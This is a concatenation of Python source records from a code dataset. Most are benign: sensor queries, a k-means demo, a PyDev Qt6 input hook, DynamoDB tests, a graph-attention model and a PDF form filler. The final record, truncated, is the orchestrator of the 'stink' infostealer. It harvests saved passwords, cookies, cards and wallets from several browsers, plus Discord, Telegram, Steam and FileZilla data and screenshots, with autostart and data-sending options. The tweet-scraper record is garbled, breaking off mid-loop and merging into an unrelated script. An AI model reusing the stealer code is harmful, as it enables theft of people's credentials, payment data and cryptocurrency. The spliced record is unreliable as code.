f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # counter1 += 1 <- this signifies occurrence of same event\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # else still add 1 to counter\n else:\n counter[i] += 1\n # update last fid\n lastfid[i] = fid\n # 3b) check door1 for closed scenarios\n else:\n # if doorState1 is closed and eventStatus1 is opened\n if doorState == '1' and eventStatus[i] == '0':\n # send appropiate response \"Event is closed\" and write to a different table within db (EventsTable)\n sendMessage(str(message[i][2]))\n print(message[i][2] + \" (\" + str(datetime.datetime.now()) + \")\")\n # write tuple to file\n tuple = str(cursor) + ',' + str(message[i][2])\n f.write(tuple)\n # flush to make sure all writes are committed\n f.flush()\n # change eventStatus1 to closed\n eventStatus[i] = '1'\n # change eventStatus1 to closed\n counter[i] = 0\n # update last fid\n lastfid[i] = fid\n # else do nothing and move on\n # sleep 1 second before going through again\n time.sleep(1)\n\n # close connections when done\n f.close()\n cursor.close()\n 
cnx.close()\n\nmain()\n","sub_path":"SIE558_FinalStreamQueries.py","file_name":"SIE558_FinalStreamQueries.py","file_ext":"py","file_size_in_byte":9680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
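The per-door "latest row" queries in the record above join the subquery only on `insertTime`, so a row from one door could match another door's maximum timestamp before the `WHERE` filter runs. A minimal sketch of the safer variant that also matches the group key and fetches all four doors in one statement (connection values are placeholders; the column names are inferred from the tuple unpacking in the script):

```python
import pymysql

# Placeholder credentials; substitute real ones.
cnx = pymysql.connect(host="localhost", port=3306, user="user",
                      passwd="secret", db="SIE558FinalProject")

LATEST_PER_DOOR = """
    SELECT d.fid, d.doorID, d.doorState, d.insertTime
    FROM DoorSensors d
    INNER JOIN (
        SELECT doorID, MAX(insertTime) AS max_insertTime
        FROM DoorSensors
        GROUP BY doorID
    ) e ON d.doorID = e.doorID AND d.insertTime = e.max_insertTime
"""

with cnx.cursor() as cursor:
    # One round trip returns the newest row for every door,
    # replacing the four near-identical query strings above.
    cursor.execute(LATEST_PER_DOOR)
    for fid, door_id, door_state, insert_time in cursor.fetchall():
        print(fid, door_id, door_state, insert_time)
cnx.close()
```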
+{"seq_id":"66711681","text":"import json\nfrom graphbrain import *\n\n\ndef edge2dict(hg, edge):\n return {'edge': ent2str(edge),\n 'text': hg.get_str_attribute(edge, 'text')}\n\n\ndef run(args):\n hg = hypergraph(args.hg)\n\n edge_data = [edge2dict(hg, edge) for edge in hg.all()]\n\n with open(args.outfile, 'w') as json_file:\n json.dump(edge_data, json_file)\n","sub_path":"graphbrain/commands/hg2json.py","file_name":"hg2json.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"641667980","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Apr 3 08:14:51 2018\r\n\r\n@author: Ash\r\n\"\"\"\r\nfrom sklearn import datasets\r\nfrom sklearn.cluster import KMeans\r\n\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import style\r\nstyle.use(\"ggplot\")\r\n\r\n########################################\r\n# Load Data\r\n# \r\niris = datasets.load_iris()\r\nX_iris = iris.data\r\n\r\n# Retrieve only the first 2 variables\r\n# Petal Length + Petal Width from the data\r\n#\r\nX2_iris = iris.data[:,0:2]\r\n\r\n#print(X2_iris)\r\n#y_iris = iris.target\r\n#print(y_iris)\r\n#len(y_iris)\r\n\r\nplt.scatter(X2_iris[:,0], X2_iris[:,1], s=10, linewidth=5)\r\nplt.show()\r\n\r\n##################################\r\nclf = KMeans(n_clusters=3)\r\nclf.fit(X2_iris)\r\n\r\ncentroids = clf.cluster_centers_\r\nlabels = clf.labels_\r\nprint(centroids)\r\nprint(labels)\r\n\r\n####################################\r\n# Colors = Green, Red, Cyan, Blue, Black, Green\r\ncolors = [\"g.\",\"r.\",\"c.\",\"b.\",\"k.\",\"g.\"]\r\n\r\nfor i in range(len(X2_iris)):\r\n plt.plot(X2_iris[i][0], X2_iris[i][1], colors[labels[i]], markersize = 10)\r\n \r\nplt.scatter(centroids[:,0], centroids[:,1], marker='x', s=150, linewidth=5)\r\nplt.show()\r\n ","sub_path":"cs61/s9/02 k-Means cluster Ex02 Iris.py","file_name":"02 k-Means cluster Ex02 Iris.py","file_ext":"py","file_size_in_byte":1130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"328270780","text":"import sys\nimport collections\ninput = sys.stdin.readline\n\nn = int(input())\narr = list(map(int, input().split()))\ndp = [0] * n\n\nfor i in range(n):\n maxi = 0\n for j in range(i):\n if arr[j] > arr[i]:\n maxi = max(maxi, dp[j])\n dp[i] = maxi + 1\n\nprint(max(dp))\n","sub_path":"백준/11722.py","file_name":"11722.py","file_ext":"py","file_size_in_byte":283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"29648491","text":"\n\n#calss header\nclass _ABSCISSA():\n\tdef __init__(self,): \n\t\tself.name = \"ABSCISSA\"\n\t\tself.definitions = [u'a number on an X-axis that shows the coordinate of a point']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_abscissa.py","file_name":"_abscissa.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"489758402","text":"# -*- coding: utf-8 -*-\n\"\"\"\nQt6's inputhook support function\n\nAuthor: Christian Boos\n\"\"\"\n\n#-----------------------------------------------------------------------------\n# Copyright (C) 2011 The IPython Development Team\n#\n# Distributed under the terms of the BSD License. The full license is in\n# the file COPYING, distributed as part of this software.\n#-----------------------------------------------------------------------------\n\n#-----------------------------------------------------------------------------\n# Imports\n#-----------------------------------------------------------------------------\n\nimport os\nimport signal\n\nimport threading\n\n\nfrom PyQt6 import QtCore, QtGui\nfrom pydev_ipython.inputhook import allow_CTRL_C, ignore_CTRL_C, stdin_ready\n\n# To minimise future merging complexity, rather than edit the entire code base below\n# we fake InteractiveShell here\nclass InteractiveShell:\n _instance = None\n @classmethod\n def instance(cls):\n if cls._instance is None:\n cls._instance = cls()\n return cls._instance\n def set_hook(self, *args, **kwargs):\n # We don't consider the pre_prompt_hook because we don't have\n # KeyboardInterrupts to consider since we are running under PyDev\n pass\n\n\n#-----------------------------------------------------------------------------\n# Module Globals\n#-----------------------------------------------------------------------------\n\ngot_kbdint = False\nsigint_timer = None\n\n#-----------------------------------------------------------------------------\n# Code\n#-----------------------------------------------------------------------------\n\ndef create_inputhook_qt6(mgr, app=None):\n \"\"\"Create an input hook for running the Qt6 application event loop.\n\n Parameters\n ----------\n mgr : an InputHookManager\n\n app : Qt Application, optional.\n Running application to use. 
If not given, we probe Qt for an\n existing application object, and create a new one if none is found.\n\n Returns\n -------\n A pair consisting of a Qt Application (either the one given or the\n one found or created) and a inputhook.\n\n Notes\n -----\n We use a custom input hook instead of PyQt6's default one, as it\n interacts better with the readline packages (issue #481).\n\n The inputhook function works in tandem with a 'pre_prompt_hook'\n which automatically restores the hook as an inputhook in case the\n latter has been temporarily disabled after having intercepted a\n KeyboardInterrupt.\n \"\"\"\n\n if app is None:\n app = QtCore.QCoreApplication.instance()\n if app is None:\n from PyQt6 import QtWidgets\n app = QtWidgets.QApplication([\" \"])\n\n # Re-use previously created inputhook if any\n ip = InteractiveShell.instance()\n if hasattr(ip, '_inputhook_qt6'):\n return app, ip._inputhook_qt6\n\n # Otherwise create the inputhook_qt6/preprompthook_qt6 pair of\n # hooks (they both share the got_kbdint flag)\n\n def inputhook_qt6():\n \"\"\"PyOS_InputHook python hook for Qt6.\n\n Process pending Qt events and if there's no pending keyboard\n input, spend a short slice of time (50ms) running the Qt event\n loop.\n\n As a Python ctypes callback can't raise an exception, we catch\n the KeyboardInterrupt and temporarily deactivate the hook,\n which will let a *second* CTRL+C be processed normally and go\n back to a clean prompt line.\n \"\"\"\n try:\n allow_CTRL_C()\n app = QtCore.QCoreApplication.instance()\n if not app: # shouldn't happen, but safer if it happens anyway...\n return 0\n app.processEvents(QtCore.QEventLoop.ProcessEventsFlag.AllEvents, 300)\n if not stdin_ready():\n # Generally a program would run QCoreApplication::exec()\n # from main() to enter and process the Qt event loop until\n # quit() or exit() is called and the program terminates.\n #\n # For our input hook integration, we need to repeatedly\n # enter and process the Qt event loop for only a short\n # amount of time (say 50ms) to ensure that Python stays\n # responsive to other user inputs.\n #\n # A naive approach would be to repeatedly call\n # QCoreApplication::exec(), using a timer to quit after a\n # short amount of time. Unfortunately, QCoreApplication\n # emits an aboutToQuit signal before stopping, which has\n # the undesirable effect of closing all modal windows.\n #\n # To work around this problem, we instead create a\n # QEventLoop and call QEventLoop::exec(). 
Other than\n # setting some state variables which do not seem to be\n # used anywhere, the only thing QCoreApplication adds is\n # the aboutToQuit signal which is precisely what we are\n # trying to avoid.\n timer = QtCore.QTimer()\n event_loop = QtCore.QEventLoop()\n timer.timeout.connect(event_loop.quit)\n while not stdin_ready():\n timer.start(50)\n # Warning: calling event_loop.exec_() can lead to hangs in REPL on mscOS PY-31931\n # Replacing it with event_loop.processEvents() fixes the issue, but leads to high CPU load on every os PY-42688\n event_loop.exec()\n timer.stop()\n except KeyboardInterrupt:\n global got_kbdint, sigint_timer\n\n ignore_CTRL_C()\n got_kbdint = True\n mgr.clear_inputhook()\n\n # This generates a second SIGINT so the user doesn't have to\n # press CTRL+C twice to get a clean prompt.\n #\n # Since we can't catch the resulting KeyboardInterrupt here\n # (because this is a ctypes callback), we use a timer to\n # generate the SIGINT after we leave this callback.\n #\n # Unfortunately this doesn't work on Windows (SIGINT kills\n # Python and CTRL_C_EVENT doesn't work).\n if(os.name == 'posix'):\n pid = os.getpid()\n if(not sigint_timer):\n sigint_timer = threading.Timer(.01, os.kill,\n args=[pid, signal.SIGINT] )\n sigint_timer.start()\n else:\n print(\"\\nKeyboardInterrupt - Ctrl-C again for new prompt\")\n\n\n except: # NO exceptions are allowed to escape from a ctypes callback\n ignore_CTRL_C()\n from traceback import print_exc\n print_exc()\n print(\"Got exception from inputhook_qt6, unregistering.\")\n mgr.clear_inputhook()\n finally:\n allow_CTRL_C()\n return 0\n\n def preprompthook_qt6(ishell):\n \"\"\"'pre_prompt_hook' used to restore the Qt6 input hook\n\n (in case the latter was temporarily deactivated after a\n CTRL+C)\n \"\"\"\n global got_kbdint, sigint_timer\n\n if(sigint_timer):\n sigint_timer.cancel()\n sigint_timer = None\n\n if got_kbdint:\n mgr.set_inputhook(inputhook_qt6)\n got_kbdint = False\n\n ip._inputhook_qt6 = inputhook_qt6\n ip.set_hook('pre_prompt_hook', preprompthook_qt6)\n\n return app, inputhook_qt6\n","sub_path":"python/helpers/pydev/pydev_ipython/inputhookqt6.py","file_name":"inputhookqt6.py","file_ext":"py","file_size_in_byte":7525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
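The heart of `inputhook_qt6` above, pumping the Qt event loop for a short slice without `QCoreApplication.exec()` and its `aboutToQuit` side effect, can be isolated to a few lines. A minimal PyQt6 sketch of that trick (50 ms mirrors the hook's slice):

```python
from PyQt6 import QtCore, QtWidgets

app = QtWidgets.QApplication([])

def pump_events_for(ms: int) -> None:
    # A QEventLoop quit by a one-shot timer processes pending events
    # for `ms` milliseconds without emitting QCoreApplication's
    # aboutToQuit signal (which would close modal windows).
    loop = QtCore.QEventLoop()
    QtCore.QTimer.singleShot(ms, loop.quit)
    loop.exec()

pump_events_for(50)
```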
+{"seq_id":"46920034","text":"from __future__ import unicode_literals, print_function\nimport unittest\nimport boto3\nimport six\nimport sys\nimport os\nimport uuid\nimport json\nfrom os.path import dirname, join\nfrom moto import mock_dynamodb2\n\nfrom api.tweet import get, post\n\nclass TestAPIFunctions(unittest.TestCase):\n\n def init(self):\n os.environ['AWS_DEFAULT_REGION'] = 'us-east-2'\n dynamodb = boto3.resource('dynamodb', region_name='us-east-2')\n table_name = os.getenv('TWEET_TABLE', 'tweets')\n \n self.table = dynamodb.create_table(\n TableName=table_name,\n KeySchema=[\n {\n # Represents the YYYYMMDD \n # This is used to query all tweets for a given day\n 'AttributeName': 'created_key',\n 'KeyType': 'HASH' #Partition key\n },\n {\n 'AttributeName': 'created',\n 'KeyType': 'RANGE' #Sort key\n }\n ],\n AttributeDefinitions=[\n {\n 'AttributeName': 'id',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'content',\n 'AttributeType': 'S'\n },\n {\n 'AttributeName': 'created',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'created_key',\n 'AttributeType': 'N'\n },\n {\n 'AttributeName': 'header',\n 'AttributeType': 'S'\n }\n ],\n ProvisionedThroughput={\n 'ReadCapacityUnits': 10,\n 'WriteCapacityUnits': 10\n }\n )\n\n # Wait until the table exists.\n self.table.meta.client.get_waiter('table_exists').wait(TableName=table_name)\n assert self.table.table_status == 'ACTIVE'\n\n def tearDown(self):\n pass\n\n @mock_dynamodb2\n def test_post(self):\n self.init() \n r1 = post.handler({'body': '''{\"content\":\"Hello\", \"header\":\"THIS\"}'''}, {})\n r2 = post.handler({'body': '''{\"content\":\"Hello2\", \"header\":\"THAT\"}'''}, {})\n \n # HTTP status of 200?\n assert r1['statusCode'] == '200'\n assert r2['statusCode'] == '200'\n\n b1 = json.loads(r1['body'])\n b2 = json.loads(r2['body'])\n\n # Are the results correct?\n assert 'content' in b1 and 'header' in b1\n assert 'content' in b2 and 'header' in b2\n assert b1['content'] == 'Hello' and b1['header'] == 'THIS'\n assert b2['content'] == 'Hello2' and b2['header'] == 'THAT'\n \n @mock_dynamodb2\n def test_post_failed(self):\n self.init() \n result = post.handler({'body': '{}'}, {})\n # HTTP status of 400?\n assert result['statusCode'] == '400'\n # Are the results correct?\n assert 'error' in result['body'].lower()\n\n\n \n @mock_dynamodb2\n def test_get(self):\n self.init()\n r1 = post.handler({'body': '''{\"content\":\"Hello\", \"header\":\"THIS\"}'''}, {})\n r2 = post.handler({'body': '''{\"content\":\"Hello2\", \"header\":\"THAT\"}'''}, {})\n result = get.handler({}, {})\n\n assert result['statusCode'] == '200'\n body = json.loads(result['body'])\n assert len(body) == 2\n assert body[0]['content'] == 'Hello'\n assert body[1]['content'] == 'Hello2' \n\n \n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/api/tweets/test_handlers.py","file_name":"test_handlers.py","file_ext":"py","file_size_in_byte":3594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"38767841","text":"import keys\nimport tweepy\nimport datetime\nimport time\nimport jsonpickle\n\ntime_start = time.time()\n#Authenticatie\nkey = keys.GetKeys()\nauth = tweepy.OAuthHandler(key.consumer, key.consumer_secret)\nauth.set_access_token(key.access_token, key.access_token_secret)\napi = tweepy.API(auth)\n\n#Hoeveel tweets worden opgeslagen per run\ndate_today = datetime.datetime.now() #datum van vandaag\ntweets_per_query = 100 #Meer mag niet van twitter\ntweets_max = 500 #Hoeveel tweets er totaal worden opgeslagen\nfile_name = 'tweets-'+ date_today.strftime('%d-%m-%y') +'.txt'\nsince_id = None\nmax_id = -1\ntweet_count = 0\nprint(\"Download begint nu...\")\n\n#Scraper gaat zoeken naar:\nsearch_query = \"#COVID19\"\nwith open(file_name,'w') as f:\n print(\"Tweets met \" + search_query + \" worden gedownload.\")\n while(tweet_count精确除法\n\ndef get_average(numbers):\n \"\"\"求平均数\"\"\"\n _numbers = []\n for num in numbers:\n if '.' in num:\n _numbers.append(float(num))\n else: _numbers.append(int(num))\n sumall = sum(_numbers)\n length = len(_numbers)\n return (sumall / length)\n\ndef is_num(num):\n \"\"\"是实数\"\"\"\n try:\n if '.' in num:\n float(num); return True\n else:\n int(num); return True\n except ValueError:\n return False\n\ndef boundary_right(num):\n \"\"\"边界正确, 在[-1000, 1000]区间中\"\"\"\n if '.' in num:\n return True if (float(num)>=-1000 and float(num)<=1000) else False;\n else: return True if (int(num)>=-1000 and int(num)<=1000) else False;\n\ndef point_right(num):\n \"\"\"\n 小数点精确位数正确,\n 最多精确到后2位\n \"\"\"\n if num.count(\".\") == 1:\n return True if len(num.split('.')[-1])<3 else False\n elif num.count(\".\") > 1:\n return False\n else: return True\n\ndef ilegal_or_legal(numbers):\n ilegal_numbers = []\n legal_numbers = []\n for num in numbers:\n if (is_num(num) and boundary_right(num) and point_right(num)):\n legal_numbers.append(num)\n else: ilegal_numbers.append(num)\n return {'ilegal':ilegal_numbers, 'legal': legal_numbers}\n \nif __name__ == '__main__':\n n = input()\n input_numbers = raw_input()\n numbers = input_numbers.split()\n ilegal_numbers = ilegal_or_legal(numbers).get('ilegal')\n legal_numbers = ilegal_or_legal(numbers).get('legal')\n for num in ilegal_numbers:\n print(\"ERROR: %s is not a legal number\" % num) \n if len(legal_numbers) != 0:\n print(\"The average of %s numbers is %.2f\" % \\\n (len(legal_numbers), get_average(legal_numbers)))\n else: print(\"The average of 0 numbers is Undefined\")\n","sub_path":"neo1054.py","file_name":"neo1054.py","file_ext":"py","file_size_in_byte":1904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"19157355","text":"from django.core.management.base import BaseCommand, CommandError\nfrom datetime import date\nfrom adra.models import Persona\nfrom mailmerge import MailMerge\nimport os\nfrom django.conf import settings\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nfrom PyPDF2.generic import BooleanObject, NameObject, IndirectObject\n\n\nclass Command(BaseCommand):\n\n def handle(self, *args, **options):\n\n def set_need_appearances_writer(writer):\n # See 12.7.2 and 7.7.2 for more information:\n # http://www.adobe.com/content/dam/acom/en/devnet/acrobat/pdfs/PDF32000_2008.pdf\n try:\n catalog = writer._root_object\n # get the AcroForm tree and add \"/NeedAppearances attribute\n if \"/AcroForm\" not in catalog:\n writer._root_object.update({\n NameObject(\"/AcroForm\"): IndirectObject(len(writer._objects), 0, writer)})\n\n need_appearances = NameObject(\"/NeedAppearances\")\n writer._root_object[\"/AcroForm\"][need_appearances] = BooleanObject(\n True)\n return writer\n\n except Exception as e:\n print('set_need_appearances_writer() catch : ', repr(e))\n return writer\n\n def calculate_age(age):\n today = date.today()\n return today.year - age.year - ((today.month, today.day) < (age.month, age.day))\n\n infile = file_path = os.path.join(settings.PROJECT_ROOT, 'entrega2020.pdf')\n inputStream = open(infile, \"rb\")\n pdf_reader = PdfFileReader(inputStream, strict=False)\n if \"/AcroForm\" in pdf_reader.trailer[\"/Root\"]:\n pdf_reader.trailer[\"/Root\"][\"/AcroForm\"].update(\n {NameObject(\"/NeedAppearances\"): BooleanObject(True)})\n\n pdf_writer = PdfFileWriter()\n set_need_appearances_writer(pdf_writer)\n if \"/AcroForm\" in pdf_writer._root_object:\n pdf_writer._root_object[\"/AcroForm\"].update(\n {NameObject(\"/NeedAppearances\"): BooleanObject(True)})\n\n # personas = Persona.objects.exclude(covid=True).exclude(active=False)\n personas = Persona.objects.filter(active=True).exclude(covid=True)\n # print([ p.nombre_apellido for p in personas])\n # print(personas.count())\n pdf_writer.addPage(pdf_reader.getPage(0))\n for persona in personas:\n if persona.active:\n print(persona.id)\n familiares = persona.hijo.all()\n familiares_gr = persona.hijo.filter(edad__gt=3)\n # print(familiares_pq.count())\n mayores = 0\n menores = 0\n for f in familiares:\n if calculate_age(f.fecha_nacimiento) > 3:\n mayores += 1\n else:\n menores += 1\n\n print(mayores)\n print(menores)\n field_dictionary = {\n \"NombreOAR\": \"ADRA TORREJON\",\n \"DireccioOAR\": \"C/ Primavera 15\",\n \"Nombre y apellidos del representante de la unidad familiar\": f\"{persona.nombre_apellido}\",\n \"DNINIEPasaporte 1\": f\"{persona.dni}\",\n \"Teléfono\": f\"{persona.telefono}\",\n \"Domicilio\": f\"{persona.domicilio}\",\n \"Localidad\": f\"{persona.ciudad}\",\n \"CP\": \"28850\",\n \"TOTAL MIEMBROS UNIDAD FAMILIAR\": f\"{mayores + menores + 1}\",\n \"Niños 02 ambos inclusive\": f\"{menores}\",\n \"numarAdra\": f\"{persona.numero_adra}\"\n }\n\n pdf_writer.updatePageFormFieldValues(\n pdf_writer.getPage(0), field_dictionary)\n\n # outputStream = open(outfile, \"wb\")\n # pdf_writer.write(outputStream)\n\n # outputStream.close()\n # pdf_writer.encrypt(str.lower(f\"{persona.numero_adra}\"))\n with open(f\"./entregas/{persona.numero_adra}.pdf\", \"wb\") as out_file:\n pdf_writer.write(out_file)\n\n\n # extractedPage = open(pdf_file_path, 'rb')\n # response = HttpResponse(content_type='application/pdf')\n # response['Content-Disposition'] = f'attachment;filename=\"{persona.numero_adra}.pdf\"'\n # 
pdf_writer.write(stream=f'./entregas/{persona.numero_adra}.pdf')\n # inputStream.close()\n","sub_path":"adra/management/commands/entrega_pdf.py","file_name":"entrega_pdf.py","file_ext":"py","file_size_in_byte":4497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"20910863","text":"#!/usr/bin/env python\n# coding: utf-8\n'''\nLast update: 21.07.21. KS.Kwon\n\n'''\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\n\nfrom .layer import GraphAttention, GraphAttention_mol, Dropout_layer, Output_layer\n\n\nclass GAT(keras.models.Model):\n max_poc_node = 100\n max_mol_node = 60\n\n def __init__(self, n_poc_feature, n_atom_feature, n_bond_feature, batch_size,\n W_poc_layer, b_poc_layer, W_poc_att_self, W_poc_att_neighbor,\n W_lig_layer, b_lig_layer, W_lig_att_self, W_lig_att_neighbor,\n W_inter, b_inter, W_out, b_out, **kwargs):\n super().__init__(**kwargs)\n\n self._hidden_features = [300, 200]\n\n self.Pocket_GAT1 = GraphAttention( \n max_poc_node=GAT.max_poc_node, \n n_feature=n_poc_feature, \n n_hidden=self._hidden_features[0],\n batch_size=batch_size,\n W_layer=W_poc_layer[0],\n b_layer=b_poc_layer[0],\n W_att_self=W_poc_att_self[0],\n W_att_neighbor=W_poc_att_neighbor[0]\n )\n self.Pocket_GAT2 = GraphAttention(\n max_poc_node=GAT.max_poc_node, \n n_feature=self._hidden_features[0] * 3, \n n_hidden=self._hidden_features[1],\n batch_size=batch_size,\n W_layer=W_poc_layer[1],\n b_layer=b_poc_layer[1],\n W_att_self=W_poc_att_self[1],\n W_att_neighbor=W_poc_att_neighbor[1]\n )\n self.Ligand_GAT1 = GraphAttention_mol(\n max_mol_node=GAT.max_mol_node, \n n_atom_feature=n_atom_feature,\n n_bond_feature=n_bond_feature,\n n_hidden=self._hidden_features[0], \n batch_size=batch_size,\n W_layer=W_lig_layer[0], \n b_layer=b_lig_layer[0],\n W_att_self=W_lig_att_self[0],\n W_att_neighbor=W_lig_att_neighbor[0]\n )\n self.Ligand_GAT2 = GraphAttention_mol(\n max_mol_node=GAT.max_mol_node, \n n_atom_feature=self._hidden_features[0] * 3,\n n_bond_feature=n_bond_feature,\n n_hidden=self._hidden_features[1],\n batch_size=batch_size,\n W_layer=W_lig_layer[1], \n b_layer=b_lig_layer[1],\n W_att_self=W_lig_att_self[1],\n W_att_neighbor=W_lig_att_neighbor[1],\n add_bond_feat=False\n )\n self.Interaction_layer = Dropout_layer(\n n_input=6*self._hidden_features[1],\n n_output=100, W=W_inter, b=b_inter\n )\n self.Output_layer = Output_layer(\n n_input=100, n_output=2, W=W_out, b=b_out\n )\n\n def call(self, inputs, training=False):\n M_poc_feature, M_poc_adj, poc_d_score, poc_mask, M_atom_feature, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask = inputs\n\n M_poc_hidden1 = self.Pocket_GAT1(\n (M_poc_feature, M_poc_adj, poc_mask),\n training=training\n )\n M_poc_hidden2 = self.Pocket_GAT2(\n (M_poc_hidden1, M_poc_adj, poc_mask),\n training=training\n )\n\n M_lig_hidden1 = self.Ligand_GAT1(\n (M_atom_feature, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask),\n training=training\n )\n M_lig_hidden2 = self.Ligand_GAT2(\n (M_lig_hidden1, M_bond_feature, M_atom_adj, M_bond_adj, mol_mask),\n training=training\n )\n\n poc_FP = self._convToFP(M_poc_hidden2, poc_mask)\n lig_FP = self._convToFP(M_lig_hidden2, mol_mask)\n\n inter_input = tf.concat([poc_FP, lig_FP], axis=1)\n inter_output = self.Interaction_layer(inter_input, training=training)\n class_score, class_prob, classification = self.Output_layer(inter_output)\n\n return class_score, class_prob, classification, inter_output, poc_FP, M_poc_hidden2, lig_FP, M_lig_hidden2\n \n def loss(self, inputs, labels): \n return tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=inputs)\n\n def _convToFP(self, matrix, mask):\n n = tf.reduce_sum(mask, axis=1)\n vector = tf.reduce_sum(matrix, axis=1)\n FP = vector / tf.expand_dims(n, axis=-1)\n\n return FP\n\n def get_params(self):\n W_poc_layer1, 
b_poc_layer1, W_poc_att_self1, W_poc_att_neighbor1 = self.Pocket_GAT1.get_params()\n W_poc_layer2, b_poc_layer2, W_poc_att_self2, W_poc_att_neighbor2 = self.Pocket_GAT2.get_params()\n \n W_lig_layer1, b_lig_layer1, W_lig_att_self1, W_lig_att_neighbor1 = self.Ligand_GAT1.get_params()\n W_lig_layer2, b_lig_layer2, W_lig_att_self2, W_lig_att_neighbor2 = self.Ligand_GAT2.get_params()\n\n return np.array([\n [W_poc_layer1, W_poc_layer2],\n [b_poc_layer1, b_poc_layer2],\n [W_poc_att_self1, W_poc_att_self2],\n [W_poc_att_neighbor1, W_poc_att_neighbor2],\n [W_lig_layer1, W_lig_layer2],\n [b_lig_layer1, b_lig_layer2],\n [W_lig_att_self1, W_lig_att_self2],\n [W_lig_att_neighbor1, W_lig_att_neighbor2],\n self.Interaction_layer.W, self.Interaction_layer.b,\n self.Output_layer.W, self.Output_layer.b\n ], dtype=object)\n","sub_path":"code/model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
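`_convToFP` in the model above builds a graph fingerprint by summing node states and dividing by the count of unmasked nodes, i.e. a masked mean pool. The same operation in isolation (TensorFlow; shapes assumed `(batch, nodes, features)` with a 0/1 `(batch, nodes)` mask):

```python
import tensorflow as tf

def masked_mean_pool(node_states, mask):
    # node_states: (batch, nodes, features); mask: (batch, nodes) with
    # 1.0 for real nodes, 0.0 for padding. Padded rows are zeroed so
    # the plain sum over nodes already ignores them.
    n = tf.reduce_sum(mask, axis=1, keepdims=True)   # (batch, 1)
    summed = tf.reduce_sum(node_states, axis=1)      # (batch, features)
    return summed / n

x = tf.random.normal((2, 5, 4))
m = tf.constant([[1., 1., 1., 0., 0.], [1., 1., 1., 1., 1.]])
print(masked_mean_pool(x * m[..., None], m).shape)   # (2, 4)
```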
+{"seq_id":"101860069","text":"from sys import argv\nfrom threading import Thread\nfrom multiprocessing import Pool\nfrom os import path, makedirs, remove\nfrom shutil import rmtree, make_archive\n\nfrom stink.helpers import functions\nfrom stink.enums import Features, Utils\nfrom stink.utils import Autostart, Message\nfrom stink.helpers.config import MultistealerConfig, Browsers\nfrom stink.modules import Chromium, Discord, FileZilla, Processes, Screenshot, System, Telegram, Steam\n\n\nclass Stealer(Thread):\n \"\"\"\n Collects and sends the specified data.\n \"\"\"\n\n def __init__(self, senders: list = [], features: list = [Features.all], utils: list = []):\n Thread.__init__(self, name=\"Stealer\")\n\n self.__senders = senders\n self.__errors = True if Utils.errors in utils else False\n self.__autostart = True if Utils.autostart in utils else False\n self.__message = True if Utils.message in utils else False\n\n self.__config = MultistealerConfig()\n\n browser_functions = [module for module in [\n Features.passwords,\n Features.cookies,\n Features.cards,\n Features.history,\n Features.bookmarks,\n Features.extensions,\n Features.wallets\n ] if module in features or Features.all in features]\n browser_statuses = True if len(browser_functions) > 0 else False\n\n self.__methods = [\n {\n \"object\": Chromium(\n Browsers.CHROME.value,\n self.__config.StoragePath,\n *self.__config.ChromePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.OPERA_GX.value,\n self.__config.StoragePath,\n *self.__config.OperaGXPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.OPERA_DEFAULT.value,\n self.__config.StoragePath,\n *self.__config.OperaDefaultPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.EDGE.value,\n self.__config.StoragePath,\n *self.__config.MicrosoftEdgePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.BRAVE.value,\n self.__config.StoragePath,\n *self.__config.BravePaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": Chromium(\n Browsers.VIVALDI.value,\n self.__config.StoragePath,\n *self.__config.VivaldiPaths,\n browser_functions,\n self.__errors\n ),\n \"status\": browser_statuses\n },\n {\n \"object\": System(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.system in features or Features.all in features) else False\n },\n {\n \"object\": Processes(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.processes in features or Features.all in features) else False\n },\n {\n \"object\": Screenshot(\n self.__config.StoragePath,\n \"System\",\n self.__errors\n ),\n \"status\": True if (Features.screenshot in features or Features.all in features) else False\n },\n {\n \"object\": Discord(\n self.__config.StoragePath,\n r\"Programs\\Discord\",\n self.__errors\n ),\n \"status\": True if 